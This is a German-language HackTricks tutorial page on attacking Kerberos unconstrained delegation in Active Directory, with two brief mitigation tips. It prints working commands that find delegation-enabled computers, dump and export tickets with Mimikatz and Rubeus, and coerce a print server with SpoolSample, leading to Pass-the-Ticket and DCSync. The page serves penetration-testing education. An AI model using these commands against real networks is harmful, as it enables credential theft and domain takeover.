HackTricksUnconstrained Delegation
Reading time: 4 minutes
tip
Lernen & üben Sie AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.
Unconstrained delegation
Dies ist eine Funktion, die ein Domain-Administrator für jeden Computer innerhalb der Domäne festlegen kann. Jedes Mal, wenn sich ein Benutzer an dem Computer anmeldet, wird eine Kopie des TGT dieses Benutzers in das TGS gesendet, das vom DC bereitgestellt wird, und im Speicher in LSASS gespeichert. Wenn Sie also Administratorrechte auf der Maschine haben, können Sie die Tickets dumpen und die Benutzer auf jeder Maschine impersonieren.
Wenn sich also ein Domain-Admin an einem Computer mit aktivierter Funktion "Unconstrained Delegation" anmeldet und Sie lokale Administratorrechte auf dieser Maschine haben, können Sie das Ticket dumpen und den Domain-Admin überall impersonieren (Domain-Privesc).
Sie können Computerobjekte mit diesem Attribut finden, indem Sie überprüfen, ob das userAccountControl Attribut ADS_UF_TRUSTED_FOR_DELEGATION enthält. Sie können dies mit einem LDAP-Filter von ‘(userAccountControl:1.2.840.113556.1.4.803:=524288)’ tun, was powerview macht:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs erscheinen immer, sind aber für Privesc nicht nützlich
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Empfohlene Methode
kerberos::list /export #Eine andere Methode
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Alle 10s nach neuen TGTs suchenLaden Sie das Ticket des Administrators (oder des Opferbenutzers) im Speicher mit Mimikatz oder Rubeus für ein Pass the Ticket.
Weitere Informationen: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
Weitere Informationen zur Unconstrained Delegation bei ired.team.
Force Authentication
Wenn ein Angreifer in der Lage ist, einen Computer, der für "Unconstrained Delegation" zugelassen ist, zu kompromittieren, könnte er einen Druckserver täuschen, um sich automatisch gegen ihn anzumelden und ein TGT im Speicher des Servers zu speichern.
Dann könnte der Angreifer einen Pass the Ticket-Angriff durchführen, um das Benutzerkonto des Druckserver-Computers zu impersonieren.
Um einen Druckserver dazu zu bringen, sich gegen eine beliebige Maschine anzumelden, können Sie SpoolSample verwenden:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
Wenn das TGT von einem Domänencontroller stammt, könnten Sie einen DCSync-Angriff durchführen und alle Hashes vom DC erhalten.
Weitere Informationen zu diesem Angriff auf ired.team.
Hier sind weitere Möglichkeiten, um eine Authentifizierung zu erzwingen:
Force NTLM Privileged Authentication
Minderung
- Begrenzen Sie DA/Admin-Anmeldungen auf bestimmte Dienste
- Setzen Sie "Konto ist sensibel und kann nicht delegiert werden" für privilegierte Konten.
tip
Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Unterstützen Sie HackTricks
- Überprüfen Sie die Abonnementpläne!
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
- Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.